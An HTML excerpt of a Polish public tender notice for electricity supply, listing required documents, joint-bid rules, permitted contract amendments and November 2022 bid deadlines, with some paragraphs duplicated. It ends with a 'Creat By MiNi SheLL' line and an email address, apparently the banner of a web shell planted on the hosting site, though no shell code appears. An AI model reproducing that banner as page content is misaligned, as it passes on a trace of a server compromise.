postępowaniu: <span class="normal">Podmiotowe środki dowodowe żądane w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu składane (składane na wezwanie zamawiającego) w terminie nie<br/>krótszym niż 5 dni od dnia wezwania:<br/>1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu w zakresie<br/>uprawnień do prowadzenia działalności gospodarczej zamawiający żąda dokumentów:<br/>a) ważnej Koncesji w zakresie obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji<br/>Energetykib) ważnej Koncesji w zakresie dystrybucji energii elektrycznej wydanej przez Prezesa Urzędu Regulacji<br/>Energetyki), lub (jeżeli wykonawca nie jest właścicielem sieci dystrybucyjnej) Oświadczenia (wg wzorca<br/>stanowiącego Załącznik nr 6 do SWZ) o posiadaniu ważnej Umowy zawartej z Operatorem Systemu<br/>Dystrybucyjnego umożliwiającej świadczenie usługi kompleksowej do punktów poboru opisanych w<br/>Załączniku nr 1 do SWZ, w tym w zakresie dystrybucji energii elektrycznej wytworzonej w mikroinstalacji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych<br/>lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach<br/>określonych w art.118 ustawy Pzp, przedstawienia podmiotowych środków dowodowych, o<br/>których mowa w §2 ust.1 pkt 1 lit. a i b oraz pkt 6 i 7 lit. a, b, c, d Rozporządzenia MRPiT,<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów<br/>podstawy wykluczenia z postępowania.<br/>10. Do Oferty należy załączyć<br/>1) Formularz Oferty wg wzoru stanowiącego Załącznik nr 2 i 2a do SWZ<br/>1) Oświadczenie (art. 125 ust 1 Pzp wg wzoru stanowiącego Załącznik nr 3.1 do SWZ) oraz, o<br/>ile dotyczy, oświadczenie podmiotu udostępniającego zasoby wg wzoru stanowiącego Załącznik<br/>nr 3.2. do SWZ<br/>2) (o ile dotyczy) Pełnomocnictwo do reprezentowania wykonawców występujących wspólnie<br/>3) (o ile dotyczy) Pełnomocnictwo do reprezentowania wykonawcy, jeżeli w imieniu wykonawcy<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów<br/>rejestrowych (KRS, CEDiG)<br/>*Pełnomocnictwo pod rygorem nieważności przekazuje się w postaci elektronicznej i opatruje<br/>kwalifikowanym podpisem elektronicznym bądź podpisem zaufanym lub podpisem osobistym.<br/>Jeżeli dokument sporządzony został jako dokument w postaci papierowej i opatrzony<br/>własnoręcznym podpisem, wykonawca składa cyfrowe odwzorowanie dokumentu opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>dokonuje mocodawca lub notariusz (§7 Rozporządzenia MRPiT)<br/>4) (o ile dotyczy) Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów<br/>5) (o ile dotyczy) Oświadczenie, o którym mowa w art. 117 ust.4 Pzp – według Załącznika nr 4<br/>do SWZ.<br/>6) (o ile dotyczy) Oryginał wniesienia wadium, jeżeli zabezpieczenie wadialne zostało wniesione<br/>w formie niepieniężnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Zgodnie z treścią art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 2 powyżej, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej (wg wzoru stanowiącego<br/>Załącznik nr 4 do SWZ. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, który z wykonawców<br/>realizować będzie przedmiot zamówienia.<br/>Warunek zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej.<br/>Zgodnie z treścią art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 2 powyżej, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej (wg wzoru stanowiącego<br/>Załącznik nr 4 do SWZ. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, który z wykonawców<br/>realizować będzie przedmiot zamówienia.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych.<br/>8. Zgodnie z § 6 ust. 3 Rozporządzenia PRM poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej dokonuje w przypadku:<br/>1) podmiotowych środków dowodowych oraz dokumentów potwierdzających umocowanie do<br/>reprezentowania - odpowiednio wykonawca, wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, w zakresie podmiotowych środków dowodowych lub dokumentów<br/>potwierdzających umocowanie do reprezentowania, które każdego z nich dotyczą<br/>2) innych dokumentów - odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą.<br/>1. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy<br/>zobowiązani są do przedłożenia zamawiającemu, przed udzieleniem zamówienia, umowy<br/>pomiędzy wykonawcami regulującej warunki realizacji zamówienia publicznego.2. W przypadku wykonawców ubiegających<br/>się wspólnie o udzielenie zamówienia publicznego<br/>reprezentowanych przez Pełnomocnika, niezbędne jest przedstawienie pełnomocnictwa do<br/>podpisania umowy, o ile załączone do oferty pełnomocnictwo nie uwzględniało tej czynności<br/>prawnej.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z treścią art. 455 ustawy Pzp zamawiający dopuszcza następujące zmiany w<br/>umowie:<br/>1) Zmiana jednostkowej stawki i lub ceny za 1 kWh wyłącznie w przypadku:<br/>a) ustawowej zmiany stawki podatku VAT i/lub<br/>b) ustawowej zmiany opodatkowania energii elektrycznej podatkiem akcyzowym<br/>wyłącznie o kwotę wynikającą ze zmiany tych stawek<br/>Zmiany, o których mowa w pkt 1) litera a i b obowiązywać będą od dnia wejścia w życie<br/>stosownych przepisów i nie wymagają zmiany Umowy (Aneksu).<br/>c) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-<br/>5 ustawy z dnia 10.10.2002r. o minimalnym wynagrodzeniu za pracę<br/>d) zmiany zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne i zdrowotne<br/>e) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>wyłącznie o kwotę wynikającą ze zmiany tych stawek<br/>Zmiany, o których mowa w pkt 1) litera c, d i e obowiązywać będą od dnia zawarcia przez Strony<br/>stosownego Aneksu. Warunkiem przystąpienia przez Zamawiającego do Aneksu jest<br/>udokumentowanie przez Wykonawcę wpływu przedmiotowych zmian na koszty wykonania<br/>przedmiotu niniejszej umowy, w szczególności Wykonawca zobowiązany jest przedłożyć Zamawiającemu dokumenty wskazujące na wzrost wynagrodzeń (w wyniku przedmiotowych<br/>zmian) osób biorących bezpośredni udział w realizacji zamówienia oraz wykazać wpływ wzrostu<br/>kosztów wynagrodzeń na wzrost kosztów realizacji niniejszej umowy.<br/>2) Zmiany ilości punktów poboru energii wskazanych w Załączniku nr 1 do Umowy, przy czym<br/>zmiana ilości punktów poboru energii elektrycznej wynikać może np. z włączenia punktów<br/>poboru, z likwidacji punktu poboru z eksploatacji w okresie trwania Umowy lub zmiany stanu<br/>prawnego punktu poboru (w tym przejęcia), zmiany w zakresie odbiorcy, zaistnienia przeszkód<br/>prawnych i formalnych uniemożliwiających przeprowadzenie procedury zmiany sprzedawcy, w<br/>tym w przypadku zaistnienia przeszkód uniemożliwiających rozwiązanie dotychczas<br/>obowiązujących umów. Przy czym zwiększenie ilości punktów poboru możliwe jest jedynie w<br/>obrębie grup taryfowych, które zostały ujęte w SWZ, zwiększenie ilości punktów poboru nie<br/>może spowodować zwiększenia ilości poboru energii elektrycznej o ponad 15% wolumenu<br/>szacowanego. Zamawiający deklaruje pobór energii na poziomie nie mniejszym niż 85%<br/>wolumenu wskazanego w §2 ust.1 Umowy.<br/>3) Zmiany kosztów (stawek, opłat) dystrybucji energii elektrycznej w przypadku zatwierdzenia<br/>przez Prezesa URE nowej Taryfy usług dystrybucji, o kwoty wynikające z tej zmiany. Zmiana w<br/>zakresie kosztów dystrybucji nie wymaga zmiany Umowy i obowiązywać będzie od dnia wejścia<br/>w życie Taryfy.2. Zmiana łącznego wynagrodzenie brutto Wykonawcy określonego w §7 o ile zajdą okoliczności<br/>(łącznie lub rozdzielnie) opisane w ust.1 niniejszego paragrafu.<br/>3. Zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com